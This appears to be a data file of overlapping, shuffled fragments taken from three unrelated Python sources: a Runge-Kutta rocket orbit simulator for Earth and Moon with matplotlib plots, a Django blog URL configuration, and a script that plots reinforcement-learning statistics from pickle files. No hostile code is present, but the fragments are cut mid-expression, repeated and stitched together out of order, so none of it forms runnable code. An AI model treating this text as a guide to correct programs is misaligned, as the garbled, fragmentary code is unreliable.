0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for i+1", "0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i] + h", "has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\")", "vy[i] + (h/6) * (k1vy + 2 * k2vy + 2 * k3vy", "= np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of", "+ h * 0.5 * k1vy) k2vx = F5(x[i] + h * k1x", "* 0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i] +", "''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et", "plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color", "for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param =", "rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color", "Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0]", "1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which body you", "if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates", "the x and y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0])", "color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show()", "#dvx/dt def F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))", "#Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position", "as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24", "= 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color =", "F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] + h *", "Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are", "Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N)", "vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy + 2", "+ (h/6) * (k1vy + 2 * k2vy + 2 * k3vy +", "print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis", "vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates compounded in", "4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as", "ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep,", "h * k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6)", "y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \")", "return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 *", "(x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are in m):", "= 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\":", "#Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy", "h * k3x, y[i] + h * k3y) k4vy = F4(x[i] + h", "the sum of these two # Part A RK4 Implementation for i in", "numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G", "x and y coordinates compounded in a single position variable 'r' v =", "* 0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i] +", "Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y axis", "= Ek[0]+Ep[0] #Total energy is the sum of these two # Part A", "Implementation for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y =", "(1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy", "k1y * 0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i]", "vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit...", "Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two # Part", "k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h * k3y)", "in m/s) (If the previously reccommended altitude is set then start with x", "G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome", "y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if", "h * 0.5 * k1vy) k2vx = F3(x[i] + h * k1x *", "* (k1vy + 2 * k2vy + 2 * k3vy + k4vy) t[i+1]", "= F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h * k3x,", "Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy',", "F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1] = x[i]", "r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2)", "print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight!", "(J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential", "rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the", "the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth", "ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth')", "= 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color =", "these two # Part B RK4 Implementation for i in range (0, N-1):", "(((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's", "a single position variable 'r' v = np.hypot(vx,vy) # Velocities in the x", "k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h *", "#Total energy is the sum of these two # Part B RK4 Implementation", "+ (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0", "Please enter initial velocities along the x and y axis (units are in", "+ 2 * k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y", "F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me * x *", "plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis", "= 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4()", "of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d])", "(m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x", "fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y,", "'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show() Exercise_4() Exercise_4()", "fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)')", "* 0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i] +", "def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 *", "Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket", "= F5(x[i] + h * k2x * 0.5, y[i] + h * k2y", "* y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def", "= 3.844e8 # Distance between Earth and the Moon (m) #dx/dt def F1(vx):", "k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i]", "Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of", "k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx +", "/ (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm *", "#1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i])", "= np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0]", "k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy", "+ h * 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5", "(h/6) * (k1vy + 2 * k2vy + 2 * k3vy + k4vy)", "(-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x", "* k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5 *", "+ h * k3y) x[i+1] = x[i] + (h/6) * (k1x + 2", "h * k3y) k4vy = F4(x[i] + h * k3x, y[i] + h", "(m) Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass", "/ ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def", "with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \")", "+ h * k3vy) k4vx = F3(x[i] + h * k3x, y[i] +", "--------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting", "position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0],", "PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 =", "for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i])", "Orbit Simulator! Please select which body you wish your rocket to orbit (enter", "(J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential", "Earth \\n 2. Moon\"\"\") choice = input() if choice == \"1\": # Starting", "np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x =", "#1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i])", "'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF')", "h * k3y) k4vy = F6(x[i] + h * k3x, y[i] + h", "= plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis", "A RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i])", "np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 =", "= input(\"x = \") y0 = input(\"y = \") # Starting Velocities (x,y)", "\\n 1. Earth \\n 2. Moon\"\"\") choice = input() if choice == \"1\":", "is set then start with x = 0, y = 7500)\"\"\") vx0 =", "= F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h * k3x,", "* 0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i] +", "h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i]", "= vx[i] + (h/6) * (k1vx + 2 * k2vx + 2 *", "(units are in m): (I reccommend starting with x = 7x10^6 and y", "ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy',", "and y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y =" ]
[ "django.urls import path from . import views app_name = 'blog' urlpatterns = [", "app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/',", "'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'),", "path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page, name='about'), ]", "from . import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'),", "import path from . import views app_name = 'blog' urlpatterns = [ path('',", "= [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page,", ". import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/',", "[ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page, name='about'),", "from django.urls import path from . import views app_name = 'blog' urlpatterns =", "urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about',", "path from . import views app_name = 'blog' urlpatterns = [ path('', views.post_list,", "views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'),", "import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail,", "= 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page," ]
[ "Stats: def __init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp)", "stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci',", "= stats[3] self.samples = stats[1] self.low = [] self.high = [] for i", "= Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r',", "stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax,", "stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon')", "label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper left') plt.show()", "Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111)", "stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high = []", "color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\")", "numpy as np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self,", "pickle import numpy as np import matplotlib.pyplot as plt import statistics class Stats:", "= Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax,", "stats[3] self.samples = stats[1] self.low = [] self.high = [] for i in", "Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g',", "variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201])", "self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples,", "def __init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean", "<reponame>ZhaomingXie/RLAlg import pickle import numpy as np import matplotlib.pyplot as plt import statistics", "= [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def", "def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1,", "alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig =", "matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with open (file,", "color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x',", "self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax,", "label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1", "self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig", "import statistics class Stats: def __init__(self, file): with open (file, 'rb') as fp:", "as plt import statistics class Stats: def __init__(self, file): with open (file, 'rb')", "(file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4]", "open (file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean =", "self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\")", "stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax", "= [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g',", "statistics class Stats: def __init__(self, file): with open (file, 'rb') as fp: stats", "as np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file):", "self.samples = stats[1] self.low = [] self.high = [] for i in range(len(self.mean)):", "file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2]", "class Stats: def __init__(self, file): with open (file, 'rb') as fp: stats =", "#self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high,", "stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples", "#ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 =", "import pickle import numpy as np import matplotlib.pyplot as plt import statistics class", "color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure()", "ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1", "color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper left')", "plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax,", "color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 =", "= plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen')", "[] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self,", "fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3]", "= stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high =", "ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g',", "self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low", "stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper", "= fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition',", "variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\")", "np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with", "range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label)", "fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen')", "self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high", "i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean,", "label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2", "__init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean =", "stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low = []", "Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition',", "self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low,", "label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))", "self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i)", "in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color,", "ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 =", "= stats[1] self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i])", "= pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples =", "with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean", "plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color)", "fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition',", "self.std = stats[3] self.samples = stats[1] self.low = [] self.high = [] for", "for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''):", "stats[1] self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i])", "import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with open", "= stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low =", "= Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax =", "plt import statistics class Stats: def __init__(self, file): with open (file, 'rb') as", "import numpy as np import matplotlib.pyplot as plt import statistics class Stats: def", "'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std", "as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std =", "pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1]", "[] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen'," ]
